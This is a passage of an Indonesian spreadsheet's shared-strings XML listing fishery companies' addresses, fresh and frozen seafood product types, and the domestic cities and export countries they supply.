    <t>Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Sebelah, Senangin, Kerapu, Jenaha, Merah, Kakap, Kurisi, Ayam-ayam)</t>
  </si>
  <si>
    <t>Udang Kupas Beku</t>
  </si>
  <si>
    <t>Ikan Air Tawar Segar (Lele, Jurung, Patin, Gabus)</t>
  </si>
  <si>
    <t>Jl. Klabat No.40 Perumahan Bukit Baruga, Kel. Antang, Kec. Manggala, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kabupaten Lamongan, Kota Pasuruan, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Tarakan</t>
  </si>
  <si>
    <t>American Samoa, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Maldives, Singapore, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kulit Ikan Kering</t>
  </si>
  <si>
    <t>Kota Medan, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kabupaten Lamongan, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Tarakan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Cilacap, Kabupaten Tegal, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Lemadang, Marlin, Gindara, Layaran, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kota Tegal, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kota Tegal, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Australia, Philippines, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>United Arab Emirates</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Lemadang, Marlin, Meka, Opah, Gindara, Layaran, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Japan, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang, Marlin, Meka, Layaran, Tenggiri, Barakuda, Opah, Gindara, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Lencam, Senangin, Manyung, Kuniran, Kerapu, Layur, Jenaha, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan</t>
  </si>
  <si>
    <t>Poland, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Gulama, Lencam, Senangin, Manyung, Kuniran, Kerapu, Layur, Jenaha, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro)</t>
  </si>
  <si>
    <t>Taiwan, Province of China, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Jl. Kurau RT 16 No.128, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Jl. Fakih Usman Lorong Sungai Goren Satu No.12 RT 023 RW 004, Kel. 1 Ulu, Kec. Seberang Ulu I, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Kota Palembang</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan</t>
  </si>
  <si>
    <t>Desa Daeo Majiko, Kec. Morotai Selatan, Kabupaten Pulau Morotai&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Barramundi, Kerapu, Layur, Kakap Merah, Ayam-ayam)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kuwe, Malalugis, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Neco Lor RT 06, Kel. Sabdodadi, Kec. Bantul, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Telur Bulu Babi Segar</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Sirip Pari Kering</t>
  </si>
  <si>
    <t>Jl. Raya Cakung Cilincing No.118 B, Kel. Semper Barat, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Remang, Lencam, Layur, Kakap, Kerapu)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cakalang, Salem, Lemuru, Kembung, Lemadang, Deho, Muroaji)</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Nusantara Tanjung Pandan Jl. R.E. Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong, Cumi-cumi)</t>
  </si>
  <si>
    <t>Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Timor-Leste</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Belgium, France, Germany, Netherlands, Switzerland</t>
  </si>
  <si>
    <t>Belgium, France, Germany, Guadeloupe, Japan, Mauritius, Netherlands, Qatar, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Julung-julung, Kembung, Lemadang, Marlin, Meka, Opah, Gindara, Layaran, Sarden, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, Belgium, France, Germany, Greece, Italy, Japan, Mauritius, Netherlands, Philippines, Qatar, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Australia, Belgium, France, Germany, Greece, Italy, Mauritius, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Saudi Arabia, United Arab Emirates</t>
  </si>
  <si>
    <t>Mauritius</t>
  </si>
  <si>
    <t>Ikan Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Gulama, Lencam, Sebelah, Senangin, Kerapu, Layur, Kakatua, Bawal, Kakap, Ayam-ayam, Kaci-kaci, Barramundi)</t>
  </si>
  <si>
    <t>Australia, Belgium, China, France, Germany, Mauritius, Saudi Arabia, Taiwan, Province of China, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat</t>
  </si>
  <si>
    <t>Brunei Darussalam, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Industri No.72, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Canada, China, Japan, Korea, Republic of, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. Kusuma Bangsa No.60 RT 15 RW 01, Kel. Gunung Lingkas, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kerapu, Layur, Bawal, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Layur, Bawal, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Denpasar, Kabupaten Lombok Barat</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Jl. TGH Faesal No.88X Lingkungan Gerung Sayo Indah, Kel. Mandalika, Kec. Sandubaya, Kota Mataram&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kota Mataram</t>
  </si>
  <si>
    <t>Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kembung, Sarden, Banjar)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Chile, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Rembang-Juana Km 5, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Bengkulu, Kota Bandar Lampung, Kota Batam,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Kota Jayapura</t>
  </si>
  <si>
    <t>Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Bengkulu, Kota Bandar Lampung,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t>
  </si>
  <si>
    <t>Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Austria, Brazil, Brunei Darussalam, Canada, Chile, China, Costa Rica, Denmark, Egypt, France, Germany, Hong Kong, India, Israel, Italy, Jamaica, Japan, Korea, Democratic People's Republic of, Lebanon, Libya, Macao, Malaysia, Malta, Mexico, Monaco, Nepal, Netherlands, Norfolk Island, Russian Federation, Saudi Arabia, Singapore, South Africa, Sri Lanka, Switzerland, Taiwan, Province of China, Thailand, Turkey, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Lemadang, Marlin, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Kembung, Marlin, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Makerel, Sarden, Layang)</t>
  </si>
  <si>
    <t>Jl. Plantar KUD RT 004 RW 014, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Sebelah, Kerapu, Bawal, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Sotong)</t>
  </si>
  <si>
    <t>Kawasan Industri Wijayakusuma Jl. Tugu Wijaya IV No. 2, Randugarut, Tugu, Semarang, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Hong Kong, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. Peternakan II Mangga Ubi No.24B RT 006 RW 007, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Australia, Sri Lanka</t>
  </si>
  <si>
    <t>Komplek Pergudangan BGR, Jl. Boulevard BGR No.1, Kel. Kelapa Gading Barat, Kec. Kelapa Gading, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Jhon Dory, Dover Sole, Monkfish, Turbots, Patagonian, Toothfish, Seabrem, Hake, Pollock, Cod, Seabass)</t>
  </si>
  <si>
    <t>Tiram Beku, Abalone Beku</t>
  </si>
  <si>
    <t>Jl. Raya Sarang-Tuban No.89, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Gulama, Sebelah, Layur, Bawal, Kakap, Jaket)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Makerel, Marlin, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Jl. Raya Tulehu, Dusun Mamokeng, Desa Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Tuna Utuh Beku</t>
  </si>
  <si>
    <t>Komplek Harbour View Blok A No.07, Kel. Sungai Jodoh, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Sirip Hiu Beku, Kulit Hiu Beku, Tulang Hiu Beku</t>
  </si>
  <si>
    <t>Jl. Kima Raya 2 Kav N-4 B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Barakuda, Tongkol, Kembung, Makerel, Lemadang, Layaran, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Daendels Km 82.6 No.88, Desa Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Gulama, Anggoli, Kerapu, Layur, Kapasan, Kakap, Ayam-ayam, Bloso, Jaket, Pari, Jengot)</t>
  </si>
  <si>
    <t>Belgium, China, Korea, Democratic People's Republic of, Malaysia, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cobia, Lemadang, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>China, Italy, Malaysia, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Malaysia, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Pelelangan Baru Dermaga 1 No.28-29 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>China, India, Malaysia, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Tegal</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Janahan, Kerapu, Layur, Bawal, Kakap, Ayam-ayam, Kuro, Cunang)</t>
  </si>
  <si>
    <t>China, India, Malaysia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. M. Syafei No.12 RT 02 RW 02, Kel. Talang, Kec. Payakumbuh Barat, Kota Payakumbuh&lt;br&gt;Sumatera Barat</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Naget Tuna, Tahu Tuna, Siomay Tuna)</t>
  </si>
  <si>
    <t>Kota Padang</t>
  </si>
  <si>
    <t>Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Tenggiri, Tuna)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Bawal, Kakap, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Layur, Bandeng, Cakalang)</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Jl. Berbek Industri 5 No.1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Japan, Netherlands, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Emperor, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Tulang Ikan Kering</t>
  </si>
  <si>
    <t>Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Emperor, Anggoli, Kerapu, Layur, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Australia, Japan, Singapore, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Australia, China, Japan, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Emperor, Anggoli, Kerapu, Layur, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Australia, China, Japan, Singapore, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel, Lemadang, Meka, Sarden, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan , Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Makerel, Lemadang, Meka, Sarden, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Tulang Hiu Kering</t>
  </si>
  <si>
    <t>Tulang Hiu Beku</t>
  </si>
  <si>
    <t>Daging Kepiting Beku</t>
  </si>
  <si>
    <t>Komplek Rezeki Graha Mas Blok G No.15, Kel. Sungai Panas, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Desa Mindahan RT 02 RW 01, Kec. Batealit, Kabupaten Jepara&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Bawal, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Scallop Segar</t>
  </si>
  <si>
    <t>Malaysia, Thailand</t>
  </si>
  <si>
    <t>Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Cobia, Deho, Kembung, Lemadang, Marlin, Gindara, Salem, Layaran, Cakalang, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Australia, China, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Manyung, Kuwe, Alu-alu, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Cunang, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Talang-Talang, Kakap Merah, Layaran, Layang, Tenggiri, Lasi, Kuro, Tetengkek)</t>
  </si>
  <si>
    <t>Jl. Raya Bitung Manado, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Raya Sagerat, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuwe, Kerapu, Kakatua, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Mutiara III, Kel. Curug, Kec. Gunung Sindur, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Asin Goreng</t>
  </si>
  <si>
    <t>Pergudangan Garuda Blok B2, Jl. Lantebung No.42, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile, China, India, Korea, Democratic People's Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Todak)</t>
  </si>
  <si>
    <t>Tuna Katsu Beku</t>
  </si>
  <si>
    <t>Jl. Mulawarman Gang Kompas No.29-30 RT 015, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kota Balikpapan, Kota Samarinda</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakatua, Red Sea Bream, Jenggot)</t>
  </si>
  <si>
    <t>Italy, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Gabion No.999 Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Kuring, Selayang, Sarden, Aso-aso, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Salem, Sarden, Selayang, Aso-aso, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Raya - Luwuk Biak Km 8, Kel. Boyou, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Kabupaten Gresik, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Kabupaten Gresik, Kota Surabaya, Kota Makassar, Kota Kendari</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Katamba, Kerapu, Kakatua, Merah, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Malalugis, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Gresik, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Sirip Pari Beku</t>
  </si>
  <si>
    <t>Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Kerapu, Kakatua, Bawal, Kakap Merah)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Tembang, Kembung, Sarden, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Philippines, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Kerapu, Kakatua, Bawal, Kakap Merah)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tembang, Kembung, Sarden, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Kota Pangkal Pinang, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Pisang-pisang, Kerapu, Ketarap, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Mohammad Noer 162 A, Kel. Bulak, Kec. Bulak, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Pidie Jaya</t>
  </si>
  <si>
    <t>Hong Kong</t>
  </si>
  <si>
    <t>Jl. Perjuangan Dusun III No.476, Kel. Helvetia, Kec. Labuhan Deli, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Malaysia, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mata Besar, Tongkol, Kembung, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Japan, Taiwan, Province of China</t>
  </si>
  <si>
    <t>C√¥te d'Ivoire, Japan</t>
  </si>
  <si>
    <t>Jl. Aria Jaya Santika Kp. Cirende RT 001 RW 005, Kel. Pasir Nangka, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Medan, Kota Padang, Kabupaten Cianjur, Kota Bandung</t>
  </si>
  <si>
    <t>Malaysia, Saudi Arabia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Australia, Japan, Korea, Democratic People's Republic of, Russian Federation, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Anggoli, Kerapu, Jenaha, Lutjanus, Kakatua, Kakap, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Kuwe, Nike, Tamban)</t>
  </si>
  <si>
    <t>Capelin Kering Beku</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Mujair, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Italy, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Kp. Jongjing RT 010 RW 003, Kel. Laban, Kec. Tirtayasa, Kabupaten Serang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Australia, Belgium, Chile, China, India, Japan, Korea, Democratic People's Republic of, Netherlands, Philippines, Spain, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
